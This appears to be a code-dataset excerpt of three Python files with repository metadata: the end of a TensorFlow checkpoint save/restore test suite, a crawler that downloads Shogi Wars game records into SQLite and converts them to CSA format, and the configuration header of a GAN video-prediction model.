# The optimizer creates two non-slot variables
"optimizer/beta1_power",
"optimizer/beta2_power",
# Slot variables
"model/_second/kernel/.OPTIMIZER_SLOT/optimizer/m",
"model/_second/kernel/.OPTIMIZER_SLOT/optimizer/v",
"model/_named_dense/kernel/.OPTIMIZER_SLOT/optimizer/m",
"model/_named_dense/kernel/.OPTIMIZER_SLOT/optimizer/v",
"model/_named_dense/bias/.OPTIMIZER_SLOT/optimizer/m",
"model/_named_dense/bias/.OPTIMIZER_SLOT/optimizer/v",
)
suffix = "/.ATTRIBUTES/VARIABLE_VALUE"
expected_checkpoint_names = [
name + suffix for name in expected_checkpoint_names]
six.assertCountEqual(self, expected_checkpoint_names,
named_variables.keys())
# Check that we've mapped to the right variable objects (not exhaustive)
self.assertEqual(
"global_step:0",
named_variables["optimizer_step" + suffix].name)
self.assertEqual(
"my_model/dense_1/kernel:0",
named_variables["model/_second/kernel" + suffix].name)
self.assertEqual(
"my_model/dense/kernel:0",
named_variables["model/_named_dense/kernel" + suffix].name)
self.assertEqual(
"beta1_power:0",
named_variables["optimizer/beta1_power" + suffix].name)
self.assertEqual(
"beta2_power:0",
named_variables["optimizer/beta2_power" + suffix].name)
# Spot check the generated protocol buffers.
self.assertEqual("optimizer",
serialized_graph.nodes[0].children[1].local_name)
optimizer_node = serialized_graph.nodes[serialized_graph.nodes[0].children[
1].node_id]
self.assertEqual("beta1_power",
optimizer_node.children[0].local_name)
self.assertEqual("beta1_power",
serialized_graph.nodes[optimizer_node.children[0].node_id]
.attributes[0].full_name)
self.assertEqual(
"my_model/dense/kernel",
serialized_graph.nodes[optimizer_node.slot_variables[0]
.original_variable_node_id]
.attributes[0].full_name)
# We strip off the :0 suffix, as variable.name-based saving does.
self.assertEqual(
"my_model/dense/kernel/Adam",
serialized_graph.nodes[optimizer_node.slot_variables[0]
.slot_variable_node_id]
.attributes[0].full_name)
self.assertEqual(
"my_model/dense/kernel/Adam:0",
optimizer.get_slot(
var=named_variables["model/_named_dense/kernel" + suffix],
name="m").name)
self.assertEqual(
"model/_named_dense/kernel" + suffix,
serialized_graph.nodes[
optimizer_node.slot_variables[0]
.original_variable_node_id].attributes[0].checkpoint_key)
self.assertEqual("m", optimizer_node.slot_variables[0].slot_name)
self.assertEqual(
"model/_named_dense/kernel/.OPTIMIZER_SLOT/optimizer/m" + suffix,
serialized_graph.nodes[
optimizer_node.slot_variables[0]
.slot_variable_node_id].attributes[0].checkpoint_key)
@test_util.run_in_graph_and_eager_modes()
def testSaveRestore(self):
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model)
input_value = constant_op.constant([[3.]])
if context.executing_eagerly():
optimizer.minimize(
lambda: model(input_value))
else:
train_op = optimizer.minimize(model(input_value))
# TODO(allenl): Make initialization more pleasant when graph building.
root_checkpointable.save_counter # pylint: disable=pointless-statement
self.evaluate(checkpointable_utils.gather_initializers(
root_checkpointable))
self.evaluate(train_op)
prefix = os.path.join(self.get_temp_dir(), "ckpt")
self.evaluate(state_ops.assign(model._named_dense.variables[1], [42.]))
m_bias_slot = optimizer.get_slot(model._named_dense.variables[1], "m")
self.evaluate(state_ops.assign(m_bias_slot, [1.5]))
save_path = root_checkpointable.save(file_prefix=prefix)
self.evaluate(state_ops.assign(model._named_dense.variables[1], [43.]))
self.evaluate(state_ops.assign(root_checkpointable.save_counter, 3))
optimizer_variables = self.evaluate(optimizer.variables())
self.evaluate(state_ops.assign(m_bias_slot, [-2.]))
# Immediate restoration
status = root_checkpointable.restore(save_path=save_path).assert_consumed()
status.run_restore_ops()
self.assertAllEqual([42.], self.evaluate(model._named_dense.variables[1]))
self.assertAllEqual(1, self.evaluate(root_checkpointable.save_counter))
self.assertAllEqual([1.5], self.evaluate(m_bias_slot))
if not context.executing_eagerly():
return # Restore-on-create is only supported when executing eagerly
on_create_model = MyModel()
on_create_optimizer = adam.AdamOptimizer(
0.001,
# Preserve beta1_power and beta2_power when appying gradients so we can
# test that they've been restored correctly.
beta1=1.0, beta2=1.0)
on_create_root = checkpointable_utils.Checkpoint(
optimizer=on_create_optimizer, model=on_create_model)
# Deferred restoration
status = on_create_root.restore(save_path=save_path)
on_create_model(constant_op.constant([[3.]])) # create variables
self.assertAllEqual(1, self.evaluate(on_create_root.save_counter))
self.assertAllEqual([42.],
self.evaluate(
on_create_model._named_dense.variables[1]))
on_create_m_bias_slot = on_create_optimizer.get_slot(
on_create_model._named_dense.variables[1], "m")
# Optimizer slot variables are created when the original variable is
# restored.
self.assertAllEqual([1.5], self.evaluate(on_create_m_bias_slot))
self.assertAllEqual(optimizer_variables[2:],
self.evaluate(on_create_optimizer.variables()))
dummy_var = resource_variable_ops.ResourceVariable([1.])
on_create_optimizer.minimize(loss=dummy_var.read_value)
status.assert_consumed()
beta1_power, beta2_power = on_create_optimizer._get_beta_accumulators()
self.assertAllEqual(optimizer_variables[0], self.evaluate(beta1_power))
self.assertAllEqual(optimizer_variables[1], self.evaluate(beta2_power))
# TODO(allenl): Debug garbage created by this test in python3.
def testDeferredRestorationUsageEager(self):
"""An idiomatic eager execution example."""
num_training_steps = 10
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
optimizer_step=training_util.get_or_create_global_step())
root.restore(core_saver.latest_checkpoint(checkpoint_directory))
for _ in range(num_training_steps):
# TODO(allenl): Use a Dataset and serialize/checkpoint it.
input_value = constant_op.constant([[3.]])
optimizer.minimize(
lambda: model(input_value), # pylint: disable=cell-var-from-loop
global_step=root.optimizer_step)
root.save(file_prefix=checkpoint_prefix)
self.assertEqual((training_continuation + 1) * num_training_steps,
root.optimizer_step.numpy())
def testUsageGraph(self):
"""Expected usage when graph building."""
with context.graph_mode():
num_training_steps = 10
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
with ops.Graph().as_default():
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
global_step=training_util.get_or_create_global_step())
input_value = constant_op.constant([[3.]])
train_op = optimizer.minimize(
model(input_value),
global_step=root.global_step)
checkpoint_path = core_saver.latest_checkpoint(checkpoint_directory)
with self.test_session(graph=ops.get_default_graph()) as session:
status = root.restore(save_path=checkpoint_path)
status.initialize_or_restore(session=session)
if checkpoint_path is None:
self.assertEqual(0, training_continuation)
with self.assertRaises(AssertionError):
status.assert_consumed()
else:
status.assert_consumed()
for _ in range(num_training_steps):
session.run(train_op)
root.save(file_prefix=checkpoint_prefix, session=session)
self.assertEqual((training_continuation + 1) * num_training_steps,
session.run(root.global_step))
self.assertEqual(training_continuation + 1,
session.run(root.save_counter))
@test_util.run_in_graph_and_eager_modes()
def testAgnosticUsage(self):
"""Graph/eager agnostic usage."""
# Does create garbage when executing eagerly due to ops.Graph() creation.
num_training_steps = 10
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
with ops.Graph().as_default(), self.test_session(
graph=ops.get_default_graph()), test_util.device(use_gpu=True):
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
global_step=training_util.get_or_create_global_step())
checkpoint_path = core_saver.latest_checkpoint(checkpoint_directory)
status = root.restore(save_path=checkpoint_path)
input_value = constant_op.constant([[3.]])
train_fn = functools.partial(
optimizer.minimize,
functools.partial(model, input_value),
global_step=root.global_step)
if not context.executing_eagerly():
train_fn = functools.partial(self.evaluate, train_fn())
status.initialize_or_restore()
for _ in range(num_training_steps):
train_fn()
root.save(file_prefix=checkpoint_prefix)
self.assertEqual((training_continuation + 1) * num_training_steps,
self.evaluate(root.global_step))
self.assertEqual(training_continuation + 1,
self.evaluate(root.save_counter))
# pylint: disable=cell-var-from-loop
@test_util.run_in_graph_and_eager_modes()
def testWithDefun(self):
num_training_steps = 2
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
with ops.Graph().as_default(), self.test_session(
graph=ops.get_default_graph()), test_util.device(use_gpu=True):
model = MyModel()
# Don't actually train so we can test variable values
optimizer = adam.AdamOptimizer(0.)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
global_step=training_util.get_or_create_global_step())
checkpoint_path = core_saver.latest_checkpoint(checkpoint_directory)
status = root.restore(save_path=checkpoint_path)
def train_fn():
@function.defun
def _call_model(x):
return model(x)
with backprop.GradientTape() as tape:
loss = _call_model(constant_op.constant([[3.]]))
gradients = tape.gradient(loss, model.variables)
return optimizer.apply_gradients(zip(gradients, model.variables),
global_step=root.global_step)
if not context.executing_eagerly():
train_fn = functools.partial(
self.evaluate, train_fn())
status.initialize_or_restore()
for _ in range(num_training_steps):
train_fn()
if training_continuation > 0:
status.assert_consumed()
self.assertAllClose([[42.]], self.evaluate(model.variables[0]))
else:
self.evaluate(model.variables[0].assign([[42.]]))
root.save(file_prefix=checkpoint_prefix)
self.assertEqual((training_continuation + 1) * num_training_steps,
self.evaluate(root.global_step))
self.assertEqual(training_continuation + 1,
self.evaluate(root.save_counter))
# pylint: enable=cell-var-from-loop
def _get_checkpoint_name(self, name):
root = checkpointable.Checkpointable()
checkpointable_utils.add_variable(
root, name=name, shape=[1, 2], dtype=dtypes.float64)
named_variables, _ = checkpointable_utils._serialize_object_graph(root)
checkpoint_name, = named_variables.keys()
with ops.name_scope("root/" + checkpoint_name):
pass # Make sure we can use this as an op name if we prefix it.
return checkpoint_name
def testAnonymousVarsInInit(self):
class Model(training.Model):
def __init__(self):
super(Model, self).__init__()
self.w = resource_variable_ops.ResourceVariable(0.0)
self.b = resource_variable_ops.ResourceVariable(0.0)
self.vars = [self.w, self.b]
def call(self, x):
return x * self.w + self.b
with context.eager_mode():
model = Model()
optimizer = adam.AdamOptimizer(learning_rate=0.05)
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
checkpoint = checkpointable_utils.Checkpoint(
model=model, optimizer=optimizer)
for _ in range(2):
checkpoint.save(checkpoint_prefix)
with backprop.GradientTape() as tape:
loss = (constant_op.constant(1.)
- model(constant_op.constant(1.))) ** 2
grad = tape.gradient(loss, model.vars)
optimizer.apply_gradients(
[(g, v) for g, v in zip(grad, model.vars)])
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def testDeferredSlotRestoration(self):
checkpoint_directory = self.get_temp_dir()
root = checkpointable.Checkpointable()
root.var = checkpointable_utils.add_variable(
root, name="var", initializer=0.)
optimizer = adam.AdamOptimizer(0.1)
if context.executing_eagerly():
optimizer.minimize(root.var.read_value)
else:
train_op = optimizer.minimize(root.var)
# Note that `optimizer` has not been added as a dependency of
# `root`. Create a one-off grouping so that slot variables for `root.var`
# get initialized too.
self.evaluate(checkpointable_utils.gather_initializers(
checkpointable_utils.Checkpoint(root=root, optimizer=optimizer)))
self.evaluate(train_op)
self.evaluate(state_ops.assign(root.var, 12.))
no_slots_path = checkpointable_utils.CheckpointableSaver(root).save(
os.path.join(checkpoint_directory, "no_slots"))
root.optimizer = optimizer
self.evaluate(state_ops.assign(root.var, 13.))
self.evaluate(state_ops.assign(optimizer.get_slot(name="m", var=root.var),
14.))
slots_path = checkpointable_utils.CheckpointableSaver(root).save(
os.path.join(checkpoint_directory, "with_slots"))
new_root = checkpointable.Checkpointable()
# Load the slot-containing checkpoint (deferred), then immediately overwrite
# the non-slot variable (also deferred).
slot_status = checkpointable_utils.CheckpointableSaver(
new_root).restore(slots_path)
no_slot_status = checkpointable_utils.CheckpointableSaver(
new_root).restore(no_slots_path)
with self.assertRaises(AssertionError):
no_slot_status.assert_consumed()
new_root.var = checkpointable_utils.add_variable(
new_root, name="var", shape=[])
no_slot_status.assert_consumed()
no_slot_status.run_restore_ops()
self.assertEqual(12., self.evaluate(new_root.var))
new_root.optimizer = adam.AdamOptimizer(0.1)
with self.assertRaisesRegexp(AssertionError, "beta1_power"):
slot_status.assert_consumed()
self.assertEqual(12., self.evaluate(new_root.var))
if context.executing_eagerly():
# Slot variables are only created with restoring initializers when
# executing eagerly.
self.assertEqual(14., self.evaluate(
new_root.optimizer.get_slot(name="m", var=new_root.var)))
else:
self.assertIs(new_root.optimizer.get_slot(name="m", var=new_root.var),
None)
if context.executing_eagerly():
new_root.optimizer.minimize(new_root.var.read_value)
else:
train_op = new_root.optimizer.minimize(new_root.var)
# The slot variable now exists; restore() didn't create it, but we should
# now have a restore op for it.
slot_status.run_restore_ops()
self.assertEqual(14., self.evaluate(
new_root.optimizer.get_slot(name="m", var=new_root.var)))
self.evaluate(train_op)
slot_status.assert_consumed()
def testManySavesGraph(self):
"""Saves after the first should not modify the graph."""
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.test_session(graph):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
obj = checkpointable.Checkpointable()
obj.var = variable_scope.get_variable(name="v", initializer=0.)
obj.opt = adam.AdamOptimizer(0.1)
obj.opt.minimize(obj.var.read_value())
self.evaluate(checkpointable_utils.gather_initializers(obj))
saver = checkpointable_utils.CheckpointableSaver(obj)
saver.save(checkpoint_prefix)
before_ops = graph.get_operations()
saver.save(checkpoint_prefix)
self.assertEqual(before_ops, graph.get_operations())
def testManyRestoresGraph(self):
"""Restores after the first should not modify the graph."""
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.test_session(graph):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
obj = checkpointable.Checkpointable()
obj.var = variable_scope.get_variable(name="v", initializer=0.)
obj.opt = adam.AdamOptimizer(0.1)
obj.opt.minimize(obj.var.read_value())
self.evaluate(checkpointable_utils.gather_initializers(obj))
saver = checkpointable_utils.CheckpointableSaver(obj)
save_path = saver.save(checkpoint_prefix)
saver.restore(save_path)
before_ops = graph.get_operations()
saver.restore(save_path)
self.assertEqual(before_ops, graph.get_operations())
def testMultipleGraphsNonSlotVariables(self):
with context.graph_mode():
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
optimizer = adam.AdamOptimizer(0.001)
# Construct a model in one graph
first_graph = ops.Graph()
first_session = session_lib.Session(graph=first_graph)
with first_graph.as_default(), first_session.as_default():
first_variable = resource_variable_ops.ResourceVariable([1.])
first_root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, variable=first_variable)
train_op = optimizer.minimize(first_variable.read_value)
self.evaluate(checkpointable_utils.gather_initializers(
first_root_checkpointable))
self.evaluate(train_op)
self.evaluate(first_variable.assign([1.]))
self.evaluate(optimizer.get_slot(
var=first_variable, name="m").assign([2.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(3.))
# Save and load in a second graph
second_graph = ops.Graph()
with second_graph.as_default(), session_lib.Session(graph=second_graph):
second_variable = resource_variable_ops.ResourceVariable([1.])
second_root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, variable=second_variable)
train_op = optimizer.minimize(second_variable.read_value)
second_root_checkpointable.restore(None).initialize_or_restore()
self.evaluate(train_op)
self.evaluate(second_variable.assign([4.]))
self.evaluate(optimizer.get_slot(
var=second_variable, name="m").assign([5.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(6.))
save_path = second_root_checkpointable.save(checkpoint_prefix)
self.evaluate(second_variable.assign([7.]))
self.evaluate(optimizer.get_slot(
var=second_variable, name="m").assign([8.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.assertAllEqual(6., self.evaluate(beta1_power))
status = second_root_checkpointable.restore(save_path)
status.assert_consumed().run_restore_ops()
self.assertAllEqual([4.], self.evaluate(second_variable))
self.assertAllEqual([5.], self.evaluate(optimizer.get_slot(
var=second_variable, name="m")))
beta1_power, _ = optimizer._get_beta_accumulators()
self.assertAllEqual(6., self.evaluate(beta1_power))
# Check that the first graph is unmolested
with first_graph.as_default(), first_session.as_default():
self.assertAllEqual([1.], self.evaluate(first_variable))
self.assertAllEqual([2.], self.evaluate(optimizer.get_slot(
var=first_variable, name="m")))
beta1_power, _ = optimizer._get_beta_accumulators()
self.assertAllEqual(3., self.evaluate(beta1_power))
class CheckpointCompatibilityTests(test.TestCase):
def _initialized_model(self):
input_value = constant_op.constant([[3.]])
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
optimizer_step = training_util.get_or_create_global_step()
root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model, optimizer_step=optimizer_step)
train_op = optimizer.minimize(
functools.partial(model, input_value),
global_step=optimizer_step)
self.evaluate(checkpointable_utils.gather_initializers(
root_checkpointable))
self.evaluate(train_op)
# A regular variable, a slot variable, and a non-slot Optimizer variable
# with known values to check when loading.
self.evaluate(model._named_dense.bias.assign([1.]))
self.evaluate(optimizer.get_slot(
var=model._named_dense.bias, name="m").assign([2.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(3.))
return root_checkpointable
def _set_sentinels(self, root_checkpointable):
self.evaluate(root_checkpointable.model._named_dense.bias.assign([101.]))
self.evaluate(
root_checkpointable.optimizer.get_slot(
var=root_checkpointable.model._named_dense.bias, name="m")
.assign([102.]))
beta1_power, _ = root_checkpointable.optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(103.))
def _check_sentinels(self, root_checkpointable):
self.assertAllEqual(
[1.], self.evaluate(root_checkpointable.model._named_dense.bias))
self.assertAllEqual([2.], self.evaluate(
root_checkpointable.optimizer.get_slot(
var=root_checkpointable.model._named_dense.bias, name="m")))
beta1_power, _ = root_checkpointable.optimizer._get_beta_accumulators()
self.assertAllEqual(3., self.evaluate(beta1_power))
def _write_name_based_checkpoint(self):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with context.graph_mode():
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(
graph=save_graph) as session:
root = self._initialized_model()
name_saver = core_saver.Saver()
return name_saver.save(
sess=session, save_path=checkpoint_prefix,
global_step=root.optimizer_step)
@test_util.run_in_graph_and_eager_modes()
def testLoadFromNameBasedSaver(self):
"""Save a name-based checkpoint, load it using the object-based API."""
with test_util.device(use_gpu=True):
save_path = self._write_name_based_checkpoint()
root = self._initialized_model()
self._set_sentinels(root)
with self.assertRaises(AssertionError):
self._check_sentinels(root)
object_saver = checkpointable_utils.CheckpointableSaver(root)
status = object_saver.restore(save_path)
with self.assertRaises(AssertionError):
status.assert_consumed()
status.run_restore_ops()
self._check_sentinels(root)
self._set_sentinels(root)
status.initialize_or_restore()
self._check_sentinels(root)
# TODO(allenl): Test for the core name-based saver loading object-based
# checkpoints once object-based checkpointing is in core.
def testSaveGraphLoadEager(self):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with context.graph_mode():
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(
graph=save_graph) as session:
root = self._initialized_model()
object_saver = checkpointable_utils.CheckpointableSaver(root)
save_path = object_saver.save(
session=session, file_prefix=checkpoint_prefix)
with context.eager_mode():
root = self._initialized_model()
self._set_sentinels(root)
root.restore(save_path).assert_consumed()
self._check_sentinels(root)
def testSaveEagerLoadGraph(self):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with context.eager_mode():
root = self._initialized_model()
object_saver = checkpointable_utils.CheckpointableSaver(root)
save_path = object_saver.save(file_prefix=checkpoint_prefix)
with context.graph_mode():
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(
graph=save_graph):
root = self._initialized_model()
self._set_sentinels(root)
root.restore(save_path).assert_consumed().run_restore_ops()
self._check_sentinels(root)
if __name__ == "__main__":
test.main()
| apache-2.0 | -1,022,322,882,351,399,800 | 43.902873 | 82 | 0.668962 | false |
tosh1ki/pyogi | pyogi/warscrawler.py | 1 | 9953 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import yaml
import sys
import time
import sqlite3
import requests
import datetime as dt
import pandas as pd
gtype_dict = {'10m': '', '3m': 'sb', '10s': 's1'}
WCSA_PATTERN = re.compile(r'(?<=receiveMove\(\").+?(?=\"\);)')
GAME_HEADER_PATTERN = re.compile(r'(?<=var\sgamedata\s=\s){[^}]+}', re.DOTALL)
class WarsCrawler(object):
'''将棋ウォーズ用のクローラー
Args
----------
dbpath : string
SQLiteのパス
interval : int, optional (default = 10)
取得時の時間間隔
n_retry : int, optional (default = 10)
取得時の再試行の回数のmax
'''
def __init__(self, dbpath, interval=10, n_retry=10):
self.dbpath = dbpath
self.INTERVAL_TIME = interval
self.MAX_N_RETRY = n_retry
# SQLiteに接続する
self.con = sqlite3.connect(self.dbpath)
self.con.text_factory = str
def get_html(self, url):
'''指定したurlのhtmlを取得する
'''
time.sleep(self.INTERVAL_TIME)
for n in range(self.MAX_N_RETRY):
time.sleep(10 * n * self.INTERVAL_TIME)
try:
res = requests.session().get(url)
except requests.ConnectionError:
print('\nConnection aborted.')
print(url)
res = None
if res and res.status_code == 200:
return res.text
else:
print('\nretry (WarsCrawler.get_html())\n')
sys.stdout.flush()
else:
sys.exit('Exceeded MAX_N_RETRY (WarsCrawler.get_html())')
def get_url(self, user, gtype, max_iter=10):
''' 指定したユーザーの棋譜を取得する.
Args
----------
user: string
User name
gtype: string
Kifu type
max_iter: int, optional (default=10)
取得する最大数.
10個ずつ取得するたびに判定しており厳密には守るつもりはない.
'''
url_list = []
start = 1
url = ('http://shogiwars.heroz.jp/users/history/'
'{user}?gtype={gtype}&start={start}')
pattern = 'http://shogiwars.heroz.jp:3002/games/[\w\d_-]+'
while start <= max_iter:
url = url.format(user=user, gtype=gtype, start=start)
text = self.get_html(url)
match = re.findall(pattern, text)
if match:
url_list.extend(match)
start += len(match)
else:
break
return url_list
def get_kifu(self, url):
''' urlが指す棋譜とそれに関する情報を辞書にまとめて返す.
'''
html = self.get_html(url)
res = re.findall(GAME_HEADER_PATTERN, html)[0]
# keyがquoteされていないので対処する
d = yaml.load(re.sub('[{}\t,]', ' ', res))
d['user0'], d['user1'], d['date'] = d['name'].split('-')
wars_csa = re.findall(WCSA_PATTERN, html)[0]
d['wcsa'] = wars_csa
d['datetime'] = dt.datetime.strptime(d['date'], '%Y%m%d_%H%M%S')
d['csa'] = self.wcsa_to_csa(d)
return d
def get_all_kifu(self, csvpath):
''' url_list 中の url の指す棋譜を取得,SQLiteに追加.
Args
----------
csvpath: string
クロールするurlの入っているcsvのパス
'''
df_crawled = pd.read_csv(csvpath)
not_crawled = df_crawled.query('crawled==0')
if not_crawled.empty:
print('{0}のファイルは全て取得済み'.format(csvpath))
return None
url_list = list(not_crawled.url)
sec = len(url_list) * self.INTERVAL_TIME
finish_time = dt.datetime.now() + dt.timedelta(seconds=sec)
# 途中経過の表示
print('{0}件の棋譜'.format(len(url_list)))
print('棋譜収集終了予定時刻 : {0}'.format(finish_time))
sys.stdout.flush()
df = pd.DataFrame()
for _url in url_list:
kifu = self.get_kifu(_url)
df = df.append(kifu, ignore_index=True)
df_crawled.loc[df_crawled.url == _url, 'crawled'] = 1
df_crawled.to_csv(csvpath, index=False)
if not df.empty:
df.to_sql('kifu', self.con, index=False, if_exists='append')
return df
else:
return None
def get_users(self, title, max_page=10):
'''大会名を指定して,その大会の上位ユーザーのidを取ってくる
Examples
----------
将棋ウォーズ第4回名人戦に参加しているユーザーのidを取得する.
>>> wcrawler.get_users('meijin4', max_page=100)
'''
page = 0
url = 'http://shogiwars.heroz.jp/events/{title}?start={page}'
results = []
while page < max_page:
_url = url.format(title=title, page=page)
print(_url)
sys.stdout.flush()
html = self.get_html(_url)
_users = re.findall(r'\/users\/(\w+)', html)
# _usersが空でない場合追加.そうでなければbreak
if _users:
results.extend(_users)
page += 25
else:
break
return results
def get_kifu_url(self, users, gtype, csvpath,
max_iter=10, if_exists='append'):
'''ユーザー名とgtypeを指定して棋譜のurlを取得する.
Args
----------
users: string
ユーザー名
gtype: string
gtype
csvpath: string
棋譜のurlを保存するCSVファイルのパス
max_iter: string, optional (default=10)
最大試行回数
'''
url_list = []
print('\ngtype:{0}, max_iter:{1}\n'.format(gtype, max_iter))
for _user in users:
print(_user)
_url_list = self.get_url(_user, gtype=gtype, max_iter=max_iter)
url_list.extend(_url_list)
if not url_list:
return None
df = pd.DataFrame(url_list)
df.ix[:, 1] = 0
df.columns = ['url', 'crawled']
if os.path.exists(csvpath) and if_exists == 'append':
df_before = pd.read_csv(csvpath, index_col=0)
df = pd.concat([df_before, df], axis=0, ignore_index=True)
df.to_csv(csvpath)
return df
def wcsa_to_csa(self, d):
'''将棋ウォーズ専用?のCSA形式を一般のCSA形式に変換する.
Args
----------
wars_csa
将棋ウォーズ特有のCSA形式で表された棋譜の文字列
gtype
処理したい棋譜のgtype
'''
wcsa_list = re.split(r'[,\t]', d['wcsa'])
time_up = ['\tGOTE_WIN_TIMEOUT',
'\tGOTE_WIN_DISCONNECT',
'\tGOTE_WIN_TORYO']
if d['wcsa'] in time_up:
# 1手も指さずに時間切れ or 接続切れ or 投了
return '%TIME_UP'
max_time, rule, time_limit = self.__gtype_to_rulestr(d['gtype'])
sente_prev_remain_time = max_time
gote_prev_remain_time = max_time
results = [
'\'バージョン', 'V2.2',
'\'対局者名', 'N+', d['user0'], 'N-', d['user1'],
'\'棋譜情報', '\'棋戦名', '$EVENT:', '将棋ウォーズ',
'\'対局場所', '$SITE:shogiwars.heroz.jp',
'\'開始日時',
'$START_TIME:' + d['datetime'].strftime('%Y/%m/%d %H:%M:%S'),
rule, time_limit,
'\'先手番', '+',
'\'指し手と消費時間'
]
for i, w in enumerate(wcsa_list):
if i % 2 == 0:
results.append(self.__extract_end_command(w))
else:
# 時間の行の処理
if (i - 1) % 4 == 0:
# 先手の残り時間を計算
sente_remain_time = int(w[1:])
_time = sente_prev_remain_time - sente_remain_time
sente_prev_remain_time = sente_remain_time
else:
# 後手の残り時間を計算
gote_remain_time = int(w[1:])
_time = gote_prev_remain_time - gote_remain_time
gote_prev_remain_time = gote_remain_time
results.append('T' + str(_time))
return '\n'.join(results)
def __gtype_to_rulestr(self, gtype):
if gtype == gtype_dict['10m']:
max_time = 60 * 10
rule = '\'持ち時間:10分、切れ負け'
time_limit = '$TIME_LIMIT:00:10+00'
elif gtype == gtype_dict['3m']:
max_time = 60 * 3
rule = '\'持ち時間:3分、切れ負け'
time_limit = '$TIME_LIMIT:00:03+00'
elif gtype == gtype_dict['10s']:
max_time = 3600
rule = '\'初手から10秒'
time_limit = '$TIME_LIMIT:00:00+10'
else:
print('Error: gtypeに不正な値; gtype={0}'.format(gtype))
max_time = None
rule = None
time_limit = None
return (max_time, rule, time_limit)
def __extract_end_command(w):
'''駒の動き,あるいは特殊な命令の処理
CAUTION: 仕様がわからないので全部網羅できているかわからない
'''
if w.find('TORYO') > 0 or w.find('DISCONNECT') > 0:
w_ap = '%TORYO'
elif w.find('TIMEOUT') > 0:
w_ap = '%TIME_UP'
elif w.find('DRAW_SENNICHI') > 0:
w_ap = '%SENNICHITE'
else:
w_ap = w
return w_ap
| mit | -3,913,733,935,031,709,000 | 26.858934 | 78 | 0.488241 | false |
kabrapratik28/DeepVideos | model/model_GAN.py | 1 | 38168 | import os
import sys
import shutil
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import init_ops
from tensorflow.contrib.layers.python.layers import regularizers
module_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")
if module_path not in sys.path:
sys.path.append(module_path)
from datasets.batch_generator import datasets
slim = tf.contrib.slim
tf.reset_default_graph()
trunc_normal = lambda stddev: init_ops.truncated_normal_initializer(0.0, stddev)
# Contants
image_channels = 3
time_frames_to_consider = 4
time_frames_to_predict = 4
interval=4 # frames to jump !
heigth_train= 64
width_train= 64
custom_test_size=[160,210]
heigth_test, width_test = custom_test_size
#===================================================================
# Generative Model Parameters
#===================================================================
# +1 for input from previous layer !
scale_level_feature_maps= [[128, 256, 128, 3],
[128, 256, 128, 3],
[128, 256, 512, 256, 128, 3],
[128, 256, 512, 256, 128, 3]]
# as size of image increase in scaling ... conv layer increases !
scale_level_kernel_size = [
[3, 3, 3, 3],
[5, 3, 3, 5],
[5, 3, 3, 3, 3, 5],
[7, 5, 5, 5, 5, 7]
]
#===================================================================
# Descriminative Model Parameters
#===================================================================
disc_scale_level_feature_maps = [[64],
[64, 128, 128],
[128, 256, 256],
[128, 256, 512, 128]]
# kernel sizes for each convolution of each scale network in the discriminator model
disc_scale_level_kernel_size = [[3],
[3, 3, 3],
[5, 5, 5],
[7, 7, 5, 5]]
# layer sizes for each fully-connected layer of each scale network in the discriminator model
# layer connecting conv to fully-connected is dynamically generated when creating the model
disc_fc_layer_units = [[512, 256, 1],
[1024, 512, 1],
[1024, 512, 1],
[1024, 512, 1]]
#===================================================================
# regularizer !
l2_val = 0.00005
# Adam optimizer !
adam_learning_rate = 0.0004
# Tensorboard images to show
batch_size = 8
number_of_images_to_show = 4
assert number_of_images_to_show <= batch_size, "images to show should be less !"
timesteps=16
file_path = os.path.abspath(os.path.dirname(__file__))
data_folder = os.path.join(file_path, "../../data/")
log_dir_file_path = os.path.join(file_path, "../../logs/")
model_save_file_path = os.path.join(file_path, "../../checkpoint/")
output_video_save_file_path = os.path.join(file_path, "../../output/")
iterations = "iterations/"
best = "best/"
